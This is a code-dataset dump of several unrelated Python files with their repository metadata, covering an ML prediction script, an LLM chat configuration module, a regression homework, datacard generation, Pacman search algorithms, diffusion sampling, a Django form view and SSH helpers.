prepare_data\n\nlogging.basicConfig(filename='/home/skye/Documents/Programming/sample-sklearn-ml-workflow.log',\n filemode='w',\n format='%(asctime)s: %(name)s - %(levelname)s - %(message)s')\n\ndef get_predictions( data_path=\"\", model_path=\"\"):\n champion_path = \"{0}{1}\".format(model_path, 'champion.pkl')\n print(\"0 \"+champion_path)\n champion = pickle.load(open(champion_path, 'rb'))\n\n # Future extension: Data path or data retrieval process for consistently updated data\n _, _, X_test, test_id = prepare_data(data_path)\n\n # Future extension: Write to another file, database, etc.\n print(champion.predict(X_test))\n submission_path = \"{0}{1}\".format(model_path, \"submission.csv\")\n print(submission_path)\n\n submission = pd.DataFrame({'PassengerId': test_id, 'Survived': champion.predict(X_test)})\n submission.to_csv(submission_path)\n\nif __name__ == '__main__':\n print('Version is', sys.version)\n print('sys.argv is', sys.argv)\n\n get_predictions(\"/home/skye/Documents/Programming/sample-sklearn-ml-workflow/data/\",\n \"/home/skye/Documents/Programming/sample-sklearn-ml-workflow/output/\")\n\n\n #try:\n # get_predictions(sys.argv[1], sys.argv[2])\n #except:\n # get_predictions()","repo_name":"SkYeJustis/sample-sklearn-ml-workflow","sub_path":"core/get_predictions.py","file_name":"get_predictions.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17459217447","text":"import sys\nimport logging\n\nfrom dataclasses import dataclass\n\nimport openai\nimport tiktoken\n\n\n@dataclass\nclass LLMConfig:\n model: str\n temperature: float\n max_concurrent_queries: int\n output_format: str\n\n\nconfig = None\n\n\ndef set_config(c):\n global config\n logging.debug(f\"Setting LLM config to: {c}\")\n config = c\n\n\ndef get_config():\n logging.debug(f\"Retrieved LLM config: {config}\")\n return config\n\n\ndef set_output_format(format):\n global config\n logging.debug(f\"Setting output format to {format}\")\n config.output_format = format\n\n\ndef get_output_format():\n logging.debug(f\"Retrieved output format: {config.output_format}\")\n return config.output_format\n\n\ndef set_model(m):\n global config\n logging.debug(f\"Setting model to {m}\")\n config.model = m\n\n\ndef get_model():\n logging.debug(f\"Retrieved model: {config.model}\")\n return config.model\n\n\ndef set_temperature(t):\n global config\n logging.debug(f\"Setting temperature to {t}\")\n config.temperature = t\n\n\ndef get_temperature():\n logging.debug(f\"Retrieved temperature: {config.temperature}\")\n return config.temperature\n\n\ndef set_max_concurrent_queries(m):\n global config\n logging.debug(f\"Setting max concurrent queries to {m}\")\n config.max_concurrent_queries = m\n\n\ndef get_max_concurrent_queries():\n logging.debug(f\"Retrieved max concurrent queries {config.max_concurrent_queries}\")\n return config.max_concurrent_queries\n\n\ndef get_model_max_tokens():\n model = get_model()\n if model == \"gpt-3.5-turbo\":\n return 4096\n elif model == \"gpt-4\":\n return 8192\n elif model == \"gpt-4-32k\":\n return 32768\n else:\n logging.error(f\"Unknown model: {model}\")\n sys.exit(-1)\n\n\ndef get_base_messages():\n messages = [\n {\n \"role\": \"system\",\n \"content\": \"\"\"You are sysgrok, a helpful assistant for performance analysis and optimisation\n of software. Answer as concisely as possible. \"\"\"\n }]\n\n output_format = get_output_format()\n if output_format:\n messages.append({\n \"role\": \"user\",\n \"content\": f\"You must format your output as {output_format}\"\n })\n\n return messages\n\n\ndef get_token_count(data):\n enc = tiktoken.encoding_for_model(get_model())\n return len(enc.encode(data))\n\n\n# Global record of the character to token ratio for the current model. Allows us to\n# calculate it once and then reuse it as necessary.\n_command_char_token_ratio = None\n\n\ndef get_command_char_token_ratio():\n \"\"\"Returns a character:token ratio for output from Linux command line tools. This is\n calculated by applying tiktoken to sample output from the `top` command.\n \"\"\"\n\n global _command_char_token_ratio\n if _command_char_token_ratio:\n logging.debug(f\"Returning character token ratio for Linux commands: {_command_char_token_ratio}\")\n return _command_char_token_ratio\n\n top_output = \"\"\"top - 13:23:34 up 3:37, 1 user, load average: 0.00, 0.00, 0.00\nTasks: 106 total, 1 running, 105 sleeping, 0 stopped, 0 zombie\n%Cpu(s): 0.0 us, 3.1 sy, 0.0 ni, 93.8 id, 3.1 wa, 0.0 hi, 0.0 si, 0.0 st\nMiB Mem : 3920.5 total, 2199.4 free, 253.8 used, 1467.3 buff/cache\nMiB Swap: 0.0 total, 0.0 free, 0.0 used. 3388.5 avail Mem\n\n PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND\n 1 root 20 0 166192 11780 8472 S 0.0 0.3 0:07.98 systemd\n 2 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kthreadd\n 3 root 0 -20 0 0 0 I 0.0 0.0 0:00.00 rcu_gp\n 4 root 0 -20 0 0 0 I 0.0 0.0 0:00.00 rcu_par_gp\n 5 root 0 -20 0 0 0 I 0.0 0.0 0:00.00 slub_flushwq\n 6 root 0 -20 0 0 0 I 0.0 0.0 0:00.00 netns\n 8 root 0 -20 0 0 0 I 0.0 0.0 0:00.00 kworker/0:0H-kblockd\n 10 root 0 -20 0 0 0 I 0.0 0.0 0:00.00 mm_percpu_wq\n 11 root 20 0 0 0 0 I 0.0 0.0 0:00.00 rcu_tasks_rude_kthread\n 12 root 20 0 0 0 0 I 0.0 0.0 0:00.00 rcu_tasks_trace_kthread\n 13 root 20 0 0 0 0 S 0.0 0.0 0:00.15 ksoftirqd/0\n 14 root 20 0 0 0 0 I 0.0 0.0 0:00.31 rcu_sched\n 15 root rt 0 0 0 0 S 0.0 0.0 0:00.08 migration/0\n 16 root -51 0 0 0 0 S 0.0 0.0 0:00.00 idle_inject/0\n 18 root 20 0 0 0 0 S 0.0 0.0 0:00.00 cpuhp/0\n 19 root 20 0 0 0 0 S 0.0 0.0 0:00.00 cpuhp/1\n 20 root -51 0 0 0 0 S 0.0 0.0 0:00.00 idle_inject/1\n 21 root rt 0 0 0 0 S 0.0 0.0 0:00.44 migration/1\n 22 root 20 0 0 0 0 S 0.0 0.0 0:00.13 ksoftirqd/1\n 24 root 0 -20 0 0 0 I 0.0 0.0 0:00.00 kworker/1:0H-events_highpri\n 25 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kdevtmpfs\n 26 root 0 -20 0 0 0 I 0.0 0.0 0:00.00 inet_frag_wq\n 27 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kauditd\n 28 root 20 0 0 0 0 S 0.0 0.0 0:00.00 khungtaskd\n 29 root 20 0 0 0 0 I 0.0 0.0 0:00.20 kworker/u30:1-events_unbound\n 31 root 20 0 0 0 0 S 0.0 0.0 0:00.00 oom_reaper\n 32 root 0 -20 0 0 0 I 0.0 0.0 0:00.00 writeback\n 33 root 20 0 0 0 0 S 0.0 0.0 0:00.52 kcompactd0\n 34 root 25 5 0 0 0 S 0.0 0.0 0:00.00 ksmd\n 35 root 39 19 0 0 0 S 0.0 0.0 0:00.00 khugepaged\n 36 root 0 -20 0 0 0 I 0.0 0.0 0:00.00 kintegrityd\n 37 root 0 -20 0 0 0 I 0.0 0.0 0:00.00 kblockd\n 38 root 0 -20 0 0 0 I 0.0 0.0 0:00.00 blkcg_punt_bio\n 40 root 20 0 0 0 0 S 0.0 0.0 0:00.00 xen-balloon\n 41 root 0 -20 0 0 0 I 0.0 0.0 0:00.00 tpm_dev_wq\n 42 root 0 -20 0 0 0 I 0.0 0.0 0:00.00 ata_sff\n 43 root 0 -20 0 0 0 I 0.0 0.0 0:00.00 md\n 44 root 0 -20 0 0 0 I 0.0 0.0 0:00.00 edac-poller\"\"\"\n\n _command_char_token_ratio = len(top_output) / get_token_count(top_output)\n logging.debug(f\"Returning character token ratio for Linux commands: {_command_char_token_ratio}\")\n return _command_char_token_ratio\n\n\n# Global record of the character to token ratio for the current model for English prose. Allows us to\n# calculate it once and then reuse it as necessary.\n_prose_char_token_ratio = None\n\n\ndef get_prose_char_token_ratio():\n \"\"\"Returns a character:token ratio for English prose. This is calculated by applying tiktoken to\n sample text (which is actually GPT-4 generated text in a command summarisation use case).\n \"\"\"\n\n global _prose_char_token_ratio\n if _prose_char_token_ratio:\n logging.debug(f\"Returning prose token ratio for English prose: {_prose_char_token_ratio}\")\n return _prose_char_token_ratio\n\n sample_prose = \"\"\"The system has been up for 5 hours and 15 minutes with 0 users logged in. The load\n average is low (0.09, 0.04, 0.01), indicating that the system is not under heavy load. The CPU usage\n is mostly idle (99.36%), with minimal user (0.17%), system (0.12%), and I/O wait (0.29%) usage. There\n are no significant performance or stability issues detected. Memory usage is also in a healthy state,\n with 1983 MB free out of 3920 MB total, and 3399 MB available. Swap usage is at 0 MB, indicating that\n the system is not under memory pressure. The top processes running on the system include systemd,\n snapd, amazon-ssm-agent, and multipathd, among others. No processes are consuming a significant amount\n of CPU or memory resources. In conclusion, the system is currently stable and not experiencing any\n performance issues.\"\"\"\n\n _prose_char_token_ratio = len(sample_prose) / get_token_count(sample_prose)\n logging.debug(f\"Returning prose token ratio for Linux commands: {_prose_char_token_ratio}\")\n return _prose_char_token_ratio\n\n\ndef get_chat_completion_args(messages, stream=False):\n kwargs = {\n \"temperature\": get_temperature(),\n \"messages\": messages,\n \"stream\": stream\n }\n\n if openai.api_type == \"azure\":\n kwargs[\"deployment_id\"] = get_model()\n elif openai.api_type == \"open_ai\":\n kwargs[\"model\"] = get_model()\n else:\n logging.error(f\"Unknown API type: {openai.api_type}\")\n sys.exit(1)\n\n return kwargs\n\n\ndef get_llm_response(prompt):\n messages = get_base_messages()\n messages.append({\n \"role\": \"user\",\n \"content\": prompt\n })\n response = openai.ChatCompletion.create(\n **get_chat_completion_args(messages)\n )\n\n return response[\"choices\"][0][\"message\"][\"content\"]\n\n\ndef print_streamed_llm_response(prompt, conversation=None):\n response = []\n\n if not conversation:\n conversation = get_base_messages()\n\n conversation.append({\n \"role\": \"user\",\n \"content\": prompt\n })\n\n completion = openai.ChatCompletion.create(\n **get_chat_completion_args(conversation, stream=True)\n )\n\n wrote_reply = False\n for chunk in completion:\n delta = chunk[\"choices\"][0][\"delta\"]\n if \"content\" not in delta:\n continue\n content = delta[\"content\"]\n sys.stdout.write(content)\n response.append(content)\n wrote_reply = True\n\n if wrote_reply:\n sys.stdout.write(\"\\n\")\n\n conversation.append({\"role\": \"assistant\", \"content\": \"\".join(response)})\n\n return conversation\n\n\ndef chat(conversation):\n print(\"--- Start chat with the LLM ---\")\n print(\"Input 'c' to exit the chat and continue operation\")\n print(\"Input 'q' to exit the chat and exit the copilot\")\n user_input = \"\"\n\n while True:\n user_input = input(\"chat> \")\n if user_input == \"c\":\n print(\"--- End chat with the LLM ---\")\n return conversation\n elif user_input == \"q\":\n print(\"--- End chat with the LLM ---\")\n sys.exit(0)\n\n conversation = print_streamed_llm_response(user_input, conversation)\n","repo_name":"elastic/sysgrok","sub_path":"sgrk/llm.py","file_name":"llm.py","file_ext":"py","file_size_in_byte":10598,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"48"} +{"seq_id":"21156520297","text":"import numpy as np\nimport csv\nimport sys\nimport scipy\nfrom sklearn.preprocessing import normalize\nnp.set_printoptions(precision=2)\n\nlambdaa = float(sys.argv[1])\nsigma2 = float(sys.argv[2])\nX = sys.argv[3]\ny = sys.argv[4]\ntestData = sys.argv[5]\n\nX_train = np.loadtxt(X, delimiter=\",\")\n#X_train = (X_train - np.mean(X_train, axis=0)) / np.std(X_train, axis=0)\ny_train = np.loadtxt(y, delimiter=\",\")\nX_test = np.loadtxt(testData, delimiter=\",\")\n#X_test = (X_test - np.mean(X_test, axis=0)) / np.std(X_test, axis=0)\n\nd = X_train.shape[1]\nidentityMatrix = np.eye(d)\n\nw_rr = np.matmul(np.matmul(np.linalg.inv(lambdaa * identityMatrix + np.matmul(X_train.T, X_train)),X_train.T), y_train)\n\nnp.savetxt(\"wRR\" +\"_\"+sys.argv[1] + \".csv\", w_rr,delimiter=\",\")\n\n\n## Part 2\ncapSigma = np.linalg.inv(lambdaa * identityMatrix + np.matmul(X_train.T, X_train)/sigma2)\nmu = np.matmul(np.matmul(np.linalg.inv(lambdaa * sigma2 * identityMatrix + np.matmul(X_train.T, X_train)), X_train.T),y_train)\n\n# Form predictive distribution p(y0|x0, y, X) for all unmeasured x0 element of D\nmu_new = np.matmul(X_test, mu)\nsigma2_new = np.zeros((len(X_test),1))\nfor i in xrange(len(X_test)):\n sigma2_new[i,0] = np.matmul(np.matmul(X_test[i,:], capSigma), X_test[i,:].T)\n# find Data point with maximum variance \nindex = np.argsort(-1 * sigma2_new,0)[0:10]\nindexList = index.flatten().tolist()\n\nwith open(\"active\" + \"_\" + sys.argv[1] + \"_\" +sys.argv[2] + \".csv\" , 'wb') as myfile:\n wr = csv.writer(myfile)\n wr.writerow(indexList)\n\n \n \n","repo_name":"saurabh2086/MachineLearning_ColumbiaX","sub_path":"LinearRegression/hw1_regression.py","file_name":"hw1_regression.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4328391330","text":"#! /usr/bin/python \n\nimport os\nimport sys\nimport math\nimport ROOT\nfrom Config import *\n\nSRbins = SRBins #make sure the bin number is consistent with the number of region histogram bins\n\n\nfor sig in signals:\n\n txtline = []\n txtline.append(\"echo 'Making datacards from the text files'\\n\")\n for b in range(SRBins):\n txtline.append(\"python MakeCard.py --bins %i --sig %s\\n\"%(b, sig))\n txtline.append(\"echo 'Making datacards completed'\\n\")\n fsh = open(\"MakeDataCardScript.sh\", \"w\")\n fsh.write(''.join(txtline))\n fsh.close()\n os.system('chmod 744 MakeDataCardScript.sh')\n os.system('./MakeDataCardScript.sh')\n os.system('ls datacard_Bin*.txt > ls.txt')\n\n df = {}\n with open('ls.txt','r') as ifile:\n for line in ifile:\n line = line.rstrip()\n k = line.replace(\"datacard_Bin\",\"\")\n k = k.replace(\".txt\",\"\")\n df[k]= line\n\n cardcomb = []\n for b in range(SRBins):\n lt = SRBinLabelList[b]+\"=\"+df[SRBinLabelList[b]]\n cardcomb.append(lt)\n\n bsline = []\n bsline.append(\"echo 'combining datacards for signal %s'\\n\"%sig)\n bsline.append(\"combineCards.py \"+\" \".join(cardcomb)+\" > CCDataCard_T2tt_\"+sig+\".txt\\n\")\n bsline.append(\"echo 'combining datacards completed'\\n\")\n bsline.append(\"rm datacard_Bin*.txt\\n\")\n bsline.append(\"echo 'moving combined datacards to DataCard dir'\\n\")\n bsline.append(\"mv CCDataCard_T2tt_*.txt DataCard/\\n\")\n bsline.append(\"echo 'combine datacard process completed'\\n\")\n bsline.append(\"echo '.....................'\\n\")\n bsline.append(\"echo '.....................'\\n\")\n\n bsh = open(\"CombineDataCardScript.sh\", \"w\")\n bsh.write(''.join(bsline))\n bsh.close()\n os.system('chmod 744 CombineDataCardScript.sh')\n os.system('./CombineDataCardScript.sh')\n","repo_name":"1LStopBudapest/LimitSetting","sub_path":"DataCardScript.py","file_name":"DataCardScript.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21663803265","text":"# search.py\n# ---------\n# Licensing Information: You are free to use or extend these projects for\n# educational purposes provided that (1) you do not distribute or publish\n# solutions, (2) you retain this notice, and (3) you provide clear\n# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.\n# \n# Attribution Information: The Pacman AI projects were developed at UC Berkeley.\n# The core projects and autograders were primarily created by John DeNero\n# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).\n# Student side autograding was added by Brad Miller, Nick Hay, and\n# Pieter Abbeel (pabbeel@cs.berkeley.edu).\n\n\n\"\"\"\nIn search.py, you will implement generic search algorithms which are called by\nPacman agents (in searchAgents.py).\n\"\"\"\n\nfrom cmath import exp\nfrom email import utils\nfrom inspect import CORO_SUSPENDED\nimport util\n\nclass SearchProblem:\n \"\"\"\n This class outlines the structure of a search problem, but doesn't implement\n any of the methods (in object-oriented terminology: an abstract class).\n\n You do not need to change anything in this class, ever.\n \"\"\"\n\n def getStartState(self):\n \"\"\"\n Returns the start state for the search problem.\n \"\"\"\n util.raiseNotDefined()\n\n def isGoalState(self, state):\n \"\"\"\n state: Search state\n\n Returns True if and only if the state is a valid goal state.\n \"\"\"\n util.raiseNotDefined()\n\n def getSuccessors(self, state):\n \"\"\"\n state: Search state\n\n For a given state, this should return a list of triples, (successor,\n action, stepCost), where 'successor' is a successor to the current\n state, 'action' is the action required to get there, and 'stepCost' is\n the incremental cost of expanding to that successor.\n \"\"\"\n util.raiseNotDefined()\n\n def getCostOfActions(self, actions):\n \"\"\"\n actions: A list of actions to take\n\n This method returns the total cost of a particular sequence of actions.\n The sequence must be composed of legal moves.\n \"\"\"\n util.raiseNotDefined()\n\n\ndef tinyMazeSearch(problem):\n \"\"\"\n Returns a sequence of moves that solves tinyMaze. For any other maze, the\n sequence of moves will be incorrect, so only use this for tinyMaze.\n \"\"\"\n from game import Directions\n s = Directions.SOUTH\n w = Directions.WEST\n return [s, s, w, s, w, w, s, w]\n\ndef depthFirstSearch(problem):\n #Markel\n #Creamos una clase Nodo que contenga los siguientes datos\n # coordenada: la coordenada del propio nodo\n # camino: el camino que debe realizar el pacman para llegar a él\n class Nodo:\n def __init__(self , coordenada, camino=[]):\n self.coordenada = coordenada\n self.camino = camino\n \n def print():\n #Metodo de prueba para ir comprobando si funciona\n #Este metodo se asemeja a toString() en Java\n print(\"coordenada: \"+str(self.coordenada))\n print()\n print(\"camino: \"+str(self.camino))\n \n #Obtenemos la coordenada inicial\n coordenadaInicial = problem.getStartState()\n #Creamos un Nodo con dicha coordenada con la clase que habiamos creado\n nodoInicial = Nodo(coordenada= coordenadaInicial)\n #Creamos una pila para ir almacenando los Nodos por visitar\n sinExplorar = util.Stack()\n #Introducimos el nodoInicial a la pila\n sinExplorar.push(nodoInicial)\n #Creamos una lista tipo set para ir almacenando las coordenadas visitadas\n explorados = set() #En un set es imposible que se repitan elementos\n\n\n while not sinExplorar.isEmpty(): \n #Mientras no se termine la pila\n nodoActual = sinExplorar.pop()\n #Vamos sacando nodos de uno en uno \n if nodoActual.coordenada not in explorados:\n #Y comprobamos si el nodo que hemos sacado ya lo hemos visitado\n explorados.add(nodoActual.coordenada)\n #Si no es asi, lo introducimos a el set marcandolo como visitado\n if problem.isGoalState(nodoActual.coordenada):\n #En caso de que el nodo que estemos analizando sea el final del camino hacemos return\n return nodoActual.camino\n vecinos = problem.getSuccessors( nodoActual.coordenada )\n #En caso contrario vamos sacando sus nodos vecinos\n for vecino in vecinos:\n #Por cada nodo vecino que tenga\n #Vamos a completar el camino hacia ese nodo uniendo el camino que traia el anterior\n #con la direccion que trae este\n caminoNuevo = nodoActual.camino + [vecino[1]]\n #y con este camino y la coordenada, crearemos un nuevoNodo \n nodoNuevo = Nodo(coordenada = vecino[0], camino = caminoNuevo)\n #Finalmente este nuevo nodo lo meteremos en la pila para posteriormente analizarlo\n sinExplorar.push(nodoNuevo)\n \n #finalmente devolvemos el camino que tiene el ultimo nodo analizado\n return nodoActual.camino \n \"\"\"\n Search the deepest nodes in the search tree first.\n\n Your search algorithm needs to return a list of actions that reaches the\n goal. Make sure to implement a graph search algorithm.\n\n To get started, you might want to try some of these simple commands to\n understand the search problem that is being passed in:\n\n print(\"Start:\", problem.getStartState())\n print(\"Is the start a goal?\", problem.isGoalState(problem.getStartState()))\n print(\"Start's successors:\", problem.getSuccessors(problem.getStartState()))\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n util.raiseNotDefined()\n\ndef breadthFirstSearch(problem):\n \"\"\"Search the shallowest nodes in the search tree first.\"\"\"\n \"*** YOUR CODE HERE ***\"\n \n fringe = util.Queue() #frontera (sin explorar), candidatos\n closed = set() #explorados\n #lista_direcciones = [] #movimientos para el pacman\n \n #primer estado, le meto las coordenadas iniciales y \n #la lista de direcciones por las que alcanzar esa \n #posicion. Al principio está vacía ya que es el nodo\n #inicial\n\n fringe.push((problem.getStartState(), []))\n \n #mientras tengamos frontera:\n while not fringe.isEmpty():\n \n \n actual_estado, actual_camino = fringe.pop() #sacamos la coordenada y\n #el camino para llegar a ella\n \n if problem.isGoalState(actual_estado): #si hemos llegado al punto blanco...\n return actual_camino\n \n #si no tenemos explorada la coordenada actual (esto evita explorar dos veces la misma posición)\n elif actual_estado not in closed:\n closed.add(actual_estado) #añadimos a explorados la coordenada\n sucesores = problem.getSuccessors(actual_estado) #sacamos los de alrededor\n for coord, movimiento, coste in sucesores: #de todos los de alrededor...\n #if coord not in closed: #si cada coordenada no está explorada\n nuevalistadirecciones = actual_camino + [movimiento] #la añadimos a la lista de \n #movimientos que vamos actualizando sin parar\n fringe.push((coord, nuevalistadirecciones)) #metemos en la cola la coordenada \n # y el camino para llegar a ella\n vacio=tuple() \n return vacio\n\n #util.raiseNotDefined()\n\ndef uniformCostSearch(problem):\n #Markel\n #Creamos una clase Nodo que contenga los siguientes datos\n # coordenada: la coordenada del propio nodo\n # camino: el camino que debe realizar el pacman para llegar a él\n class Nodo:\n def __init__(self , coordenada, camino=[], coste=0):\n self.coordenada = coordenada\n self.camino = camino\n self.coste = coste\n \n coordenadaInicial = problem.getStartState()\n nodoInicial = Nodo(coordenada= coordenadaInicial)\n sinExplorar = util.PriorityQueue()\n sinExplorar.update(nodoInicial, nodoInicial.coste)\n explorados = set() \n\n while not sinExplorar.isEmpty(): \n nodoActual = sinExplorar.pop()\n if nodoActual.coordenada not in explorados:\n explorados.add(nodoActual.coordenada)\n if problem.isGoalState(nodoActual.coordenada):\n return nodoActual.camino\n\n vecinos = problem.getSuccessors( nodoActual.coordenada )\n for coordVecino,caminoVecino,costeVecino in vecinos:\n nodoNuevo = Nodo(coordenada = coordVecino, camino = nodoActual.camino + [caminoVecino], coste= nodoActual.coste + costeVecino)\n sinExplorar.update(nodoNuevo, nodoNuevo.coste)\n \n #finalmente devolvemos el camino que tiene el ultimo nodo analizado\n return [] \n\n\n\n \"\"\"Search the node of least total cost first.\"\"\"\n \"*** YOUR CODE HERE ***\"\n util.raiseNotDefined()\n\ndef nullHeuristic(state, problem=None):\n \"\"\"\n A heuristic function estimates the cost from the current state to the nearest\n goal in the provided SearchProblem. This heuristic is trivial.\n \"\"\"\n return 0\n\ndef aStarSearch(problem, heuristic=nullHeuristic):\n #Markel\n #Creamos una clase Nodo que contenga los siguientes datos\n # coordenada: la coordenada del propio nodo\n # camino: el camino que debe realizar el pacman para llegar a él\n class Nodo:\n def __init__(self , coordenada, camino=[], coste=0):\n self.coordenada = coordenada\n self.camino = camino\n self.coste = coste\n \n #Creamos el nodo inicial\n coordenadaInicial = problem.getStartState()\n nodoInicial = Nodo(coordenada= coordenadaInicial)\n\n #Lo insertamos en sinExplorar con su coste=0\n sinExplorar = util.PriorityQueue()\n sinExplorar.push(nodoInicial, nodoInicial.coste)\n explorados = set() \n\n while not sinExplorar.isEmpty(): \n nodoActual = sinExplorar.pop()\n if nodoActual.coordenada not in explorados:\n explorados.add(nodoActual.coordenada)\n if problem.isGoalState(nodoActual.coordenada):\n return nodoActual.camino\n \n vecinos = problem.getSuccessors( nodoActual.coordenada )\n for coordVecino,caminoVecino,costeVecino in vecinos:\n #Camino = el camino que hay que recorrer para llegar a ese nodo\n #Coste = el coste que tiene llegar al nodo + el heuristico\n caminoNuevo = nodoActual.camino + [caminoVecino]\n nodoNuevo = Nodo(coordenada = coordVecino, \n camino = caminoNuevo, \n coste = problem.getCostOfActions(caminoNuevo) + heuristic(coordVecino,problem))\n \n sinExplorar.push(nodoNuevo, nodoNuevo.coste)\n \n #finalmente devolvemos el camino que tiene el ultimo nodo analizado\n return nodoActual.camino\n \n \"\"\"Search the node that has the lowest combined cost and heuristic first.\"\"\"\n \"*** YOUR CODE HERE ***\"\n util.raiseNotDefined()\n\n\n# Abbreviations\nbfs = breadthFirstSearch\ndfs = depthFirstSearch\nastar = aStarSearch\nucs = uniformCostSearch\n","repo_name":"jonblanco/Tecnicas-de-Inteligencia-Artificial","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":11293,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42564013814","text":"from apples import Apple\nimport unittest\n\ntest_apple = Apple()\n\nclass MinTest(unittest.TestCase):\n def test_apple(self):\n self.assertEqual(test_apple.get_apple(), \"eggf\", 'Ejnye')\n\nif __name__ == '__main__':\n unittest.main() \n ","repo_name":"green-fox-academy/DonBattery","sub_path":"week-04/day-3/apples_test.py","file_name":"apples_test.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23572678370","text":"import click\nimport omegaconf\nimport torch\nfrom torch import nn\nfrom torchvision.transforms import ToPILImage\n\nfrom model.diffusion import GaussianDiffusion\nfrom model.unet import DiffusionModel\nfrom torchvision.utils import make_grid\n\nfrom utils.config import get_class_from_str\n\n\n@click.command()\n@click.option(\"--config-path\", \"-c\", type=str)\n@click.option(\"--device\", \"-d\", type=str, default=\"cuda\")\n@click.option(\"--batch-size\", \"-b\", type=int, default=1)\n@click.option(\"--checkpoint-path\", \"-p\", type=str)\ndef sample(config_path, checkpoint_path, batch_size=1, device=\"cuda\"):\n config = omegaconf.OmegaConf.load(config_path)\n\n model = get_class_from_str(config.model.target)(**config.model.params).to(device)\n diffusion = get_class_from_str(config.diffusion.target)(\n model, **config.diffusion.params\n ).to(device)\n print(f\"Resuming from {checkpoint_path}\")\n checkpoint = torch.load(checkpoint_path)\n diffusion.load_state_dict(checkpoint[\"model_state_dict\"], strict=False)\n\n model.eval()\n # classes = torch.randint(0, 10, [batch_size]).to(device)\n classes = torch.tensor([1, 7, 1, 2, 1, 9, 8, 6]).to(device)\n print(classes)\n upsample = nn.Upsample(size=(model.size[0] * 3, model.size[1] * 3), mode=\"bilinear\")\n\n for _ in range(2):\n result = diffusion.p_sample_loop(\n (batch_size, model.in_channel, *model.size), classes\n )\n ToPILImage()(make_grid(upsample(result.cpu()))).show()\n\n\nif __name__ == \"__main__\":\n sample()\n","repo_name":"luc-leonard/pytorch-diffusion-autoencoder","sub_path":"scripts/sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"30614444625","text":"# QUESTION URL: https://www.hackerrank.com/challenges/merge-the-tools/problem\n# STATUS: Wrong Answer\n\ndef merge_the_tools(string, k):\n # your code goes here\n items_len = len(string)//k\n start = 0\n for _ in range(items_len):\n counted = \"\"\n value = string[start:items_len+start]\n for i in value:\n if i not in counted:\n print(i, end=\"\")\n counted += i\n print()\n start += items_len\n\n","repo_name":"Yash2003Bisht/ProblemSolutions","sub_path":"solutions/hackerrank/Merge_the_Tools_/Merge_the_Tools__9.py","file_name":"Merge_the_Tools__9.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"31189424057","text":"import sqlite3\nfrom django.shortcuts import render, reverse, redirect\n# from django.contrib.auth.decorators import login_required\nfrom hrapp.models import Department\nfrom ..connection import Connection\n\n\ndef get_departments():\n with sqlite3.connect(Connection.db_path) as conn:\n conn.row_factory = sqlite3.Row\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select\n dep.id,\n dep.name,\n dep.budget\n from hrapp_department dep\n \"\"\")\n\n return db_cursor.fetchall()\n\n# @login_required\ndef department_form(request):\n if request.method == 'GET':\n departments = get_departments()\n template = 'departments/form.html'\n context = {\n 'all_departments': departments\n }\n return render(request, template, context)\n\n elif request.method == 'POST':\n form_data = request.POST\n\n with sqlite3.connect(Connection.db_path) as conn:\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n INSERT INTO hrapp_department\n (\n name, budget\n )\n VALUES (?, ?)\n \"\"\",\n (form_data['name'], form_data['budget'])\n )\n\n return redirect(reverse('hrapp:departments'))","repo_name":"nss-day-cohort-33/bangazon-workforce-management-kingdom-of-glyweth","sub_path":"hrapp/views/departments/form.py","file_name":"form.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9123308261","text":"import sys\nimport argparse\nfrom yaml import load\n\nfrom resources.libraries.python.ssh import SSH\n\n\ndef ssh_no_error(ssh, cmd, sudo=False):\n \"\"\"Execute a command over ssh channel, and log and exit if the command\n fails.\n\n :param ssh: SSH() object connected to a node.\n :param cmd: Command line to execute on remote node.\n :param sudo: Run command with sudo privileges.\n :type ssh: SSH() object\n :type cmd: str\n :type sudo: bool\n :returns: stdout from the SSH command.\n :rtype: str\n :raises RuntimeError: In case of unexpected ssh command failure\n \"\"\"\n if sudo:\n ret, stdo, stde = ssh.exec_command_sudo(cmd, timeout=60)\n else:\n ret, stdo, stde = ssh.exec_command(cmd, timeout=60)\n\n if ret != 0:\n print('Command execution failed: \"{}\"'.format(cmd))\n print('stdout: {0}'.format(stdo))\n print('stderr: {0}'.format(stde))\n raise RuntimeError('Unexpected ssh command failure')\n\n return stdo\n\n\ndef ssh_ignore_error(ssh, cmd, sudo=False):\n \"\"\"Execute a command over ssh channel, ignore errors.\n\n :param ssh: SSH() object connected to a node.\n :param cmd: Command line to execute on remote node.\n :param sudo: Run command with sudo privileges.\n :type ssh: SSH() object\n :type cmd: str\n :type sudo: bool\n :returns: stdout from the SSH command.\n :rtype: str\n \"\"\"\n if sudo:\n ret, stdo, stde = ssh.exec_command_sudo(cmd)\n else:\n ret, stdo, stde = ssh.exec_command(cmd)\n\n if ret != 0:\n print('Command execution failed: \"{}\"'.format(cmd))\n print('stdout: {0}'.format(stdo))\n print('stderr: {0}'.format(stde))\n\n return 